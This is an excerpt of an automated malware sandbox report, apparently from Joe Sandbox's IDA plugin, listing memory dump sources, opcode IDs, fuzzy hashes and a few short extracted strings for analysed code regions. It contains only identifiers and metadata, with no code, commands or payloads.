                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6b481ddf926b9400c3e54675badfe4c83f479e4314f40c9fc42a2b61d253c41c
                                                          • Instruction ID: 9f558f7013716f051f07d2e03bbf442876c3f8bae0568635be15561515e170ff
                                                          • Opcode Fuzzy Hash: 6b481ddf926b9400c3e54675badfe4c83f479e4314f40c9fc42a2b61d253c41c
                                                          • Instruction Fuzzy Hash: 4BE01270D01208EFCB54DFA8E40469CBBB8EB88301F1081E9D808A3304E7369A40CF81
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386674114.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7160000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 31656f99f8e64542671e71096db9652e83790fdbfc5c9d4c771413c2a6d76f37
                                                          • Instruction ID: c48639927a65b356e8f312f28b6cad6634656aa02a85e4f639cd2af8a4591c70
                                                          • Opcode Fuzzy Hash: 31656f99f8e64542671e71096db9652e83790fdbfc5c9d4c771413c2a6d76f37
                                                          • Instruction Fuzzy Hash: 27E0C2B4A0820CDBC709DFA8E5405ACBBB8EF86310F10C1D8C80827381CF329E42CB80
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5610c596b5b5538ab4560559fb30f530e9ea987832c915d4d4403a6e8eee054e
                                                          • Instruction ID: e3a222d7b903a15355190ae0b280d4a62fa6a1465a382d697613fea12bee810b
                                                          • Opcode Fuzzy Hash: 5610c596b5b5538ab4560559fb30f530e9ea987832c915d4d4403a6e8eee054e
                                                          • Instruction Fuzzy Hash: 12E0EC70D15208EFC780DFB8D4456DCBBB9AF49225F1041A9D90893340E6755A54CF95
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d80cc4b0767faa3f1d1b316d9ce85613004264eb0bfd50a4f0c0e501d30aef7
                                                          • Instruction ID: 9fd8b5724383ad2e432d7b391f0df9e20250a6a90a6078dfe7953d884f026515
                                                          • Opcode Fuzzy Hash: 0d80cc4b0767faa3f1d1b316d9ce85613004264eb0bfd50a4f0c0e501d30aef7
                                                          • Instruction Fuzzy Hash: 7BE0C27188110CDFCB81FBB4C90068D7BFDDF4A341F4085E9C100D3120EA714A00EBA1
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction ID: 0d5de0bcfc642141a48efabdd33aad8d40a595517d8fecd13cd84dd7eff40575
                                                          • Opcode Fuzzy Hash: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction Fuzzy Hash: D0E0C274A08108DFCB44DFA8D4405ACBFBAEB85310F10C1ECD80917341CA329E42EB90
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction ID: 104546a045ddf36b05be3df28f941dee855e7a1f1ac70b933703ecfe1d9bc07e
                                                          • Opcode Fuzzy Hash: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction Fuzzy Hash: 7BE08C34908108DBCB44DFA4D4805ADBBB9AB85314F1081D9C80817341C6339E42DB90
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction ID: 02c5078c27d89d4873176ed54e5e6e3eae2d5ef07274444b8ea9ebb5c8013011
                                                          • Opcode Fuzzy Hash: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction Fuzzy Hash: DBE08C74D18208EFCB44DFA4D5445ACBFB9AB89310F6081E8C80817342CA329E42DB90
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction ID: 4819827addbcd9dac3696fa4172a067a78bf5e3ed36e126ff622e8daa05bcb89
                                                          • Opcode Fuzzy Hash: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction Fuzzy Hash: C9E0C274D18108EFCB48DFA4D4415ADBFB9EB86314F10C2D9C80817351CA739E42DB90
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction ID: 44710fcaa4cad01db6fd008ff06482f3238e4da2726fe3e4f983e45b3977d9f4
                                                          • Opcode Fuzzy Hash: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction Fuzzy Hash: F2E0C234909108DFCB44DFA4D4416ACBFB9EB85310F10C1DCC80917341C632AE42DB90
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 00891338e1f80b119bc8dba997f91930467774af6f3dc21f5dbf9a5cc2d71568
                                                          • Instruction ID: 07d51cda678cb82e04945829e22ef796bd2ca731fb07348f587f46f56477772b
                                                          • Opcode Fuzzy Hash: 00891338e1f80b119bc8dba997f91930467774af6f3dc21f5dbf9a5cc2d71568
                                                          • Instruction Fuzzy Hash: D7F05FB4E016688FCBA0CF24DD84B9ABBF5BB89311F0040E9D549A3254EB315E80CF05
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0cecc324e8ab20705e1f6ef264d3547854c85d30dbc8ea4bf04ac3e61db5494b
                                                          • Instruction ID: 584d3a4bd9076ec657d10c44909ce1470d3ac97a7801b94d8da98de0fd022a2f
                                                          • Opcode Fuzzy Hash: 0cecc324e8ab20705e1f6ef264d3547854c85d30dbc8ea4bf04ac3e61db5494b
                                                          • Instruction Fuzzy Hash: CFE08C30814108DFCB90DBA8C4412ACBFB89B49215F50C0D9DC4857341E6329A42DB90
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd99da2609284f99d33f3c2893be1227209a8f7ed239945a5b2751e0a8a83ccd
                                                          • Instruction ID: 053346807e3146394aac1302df880a5400d6e4a9b9af4704049bbd334230b820
                                                          • Opcode Fuzzy Hash: cd99da2609284f99d33f3c2893be1227209a8f7ed239945a5b2751e0a8a83ccd
                                                          • Instruction Fuzzy Hash: C8E08C70D05108DFCB80DBA8C4406ACBBF8AB49310F1080D8C80897341E6329E41DB90
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8239e4c9b06a58683a527f00419d192108396b0002fa9bc8f06538c9007fb007
                                                          • Instruction ID: c5446528d8a2582a5bf206f6a0cf7acc31df54afc2bfa22ed51378eea5b6de52
                                                          • Opcode Fuzzy Hash: 8239e4c9b06a58683a527f00419d192108396b0002fa9bc8f06538c9007fb007
                                                          • Instruction Fuzzy Hash: B1E0E2B0911208EFCB54EFB8995429DBBB9AB44212F6041EDC908A6350EB329A90DF85
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 69dc07e9fb6425ee32d487363da9f4b6c0ed955cc77f6360b784c2211f9c651d
                                                          • Instruction ID: 69db84c7bec887362321ced82fab044e55a00416da56ad3a758a664760cc24f6
                                                          • Opcode Fuzzy Hash: 69dc07e9fb6425ee32d487363da9f4b6c0ed955cc77f6360b784c2211f9c651d
                                                          • Instruction Fuzzy Hash: 8EE0C279D54208CFDF409F98C8AC6EC7FB3FB4D354F108804E50A67350CA3888028BA0
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0896bf1b4c0712ac0c2c54c35652c20fbdc7a55d771cdb601880f87e65af626f
                                                          • Instruction ID: 4fae999ab97f1696fede3f20737e1fbb05b94f924796eabbd6b1c8d731be57f2
                                                          • Opcode Fuzzy Hash: 0896bf1b4c0712ac0c2c54c35652c20fbdc7a55d771cdb601880f87e65af626f
                                                          • Instruction Fuzzy Hash: FAE0EC74D64248CFEF58DFA8E0406ACBBB2FB19304F10842AE525E7340D6359C04CF51
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3490cf820fb023f117d785034f9e8b05a8bff6796a1689a539c3ceb4629963f2
                                                          • Instruction ID: 5d43107499260e15754e40ebc1f171d9de61327e9a1f1e981fefafdb42d62353
                                                          • Opcode Fuzzy Hash: 3490cf820fb023f117d785034f9e8b05a8bff6796a1689a539c3ceb4629963f2
                                                          • Instruction Fuzzy Hash: 52E0FE74905229CFCB68DF24D958698BBF5BB48305F80D5EA9889A3244DF711E84DF40
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386674114.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7160000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5190dd1c09640c6c646980bb53789a1ffa31d8d61270d39340fc813c9bc606e3
                                                          • Instruction ID: 3a94f519782fb5bbc970c26667650c62bbb80f6701056a3398db9b3dbf4d0414
                                                          • Opcode Fuzzy Hash: 5190dd1c09640c6c646980bb53789a1ffa31d8d61270d39340fc813c9bc606e3
                                                          • Instruction Fuzzy Hash: 61D05B705041448FE7059F64C45CB767762EB4A309F25409CD51DA7681DB798946CF02
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2523026771.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2bb0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 7@A$Te]q
                                                          • API String ID: 0-2080396276
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Ddq
                                                          • API String ID: 0-562783569
                                                          Similarity
                                                          • API ID:
                                                          • String ID: pk
                                                          • API String ID: 0-2816773387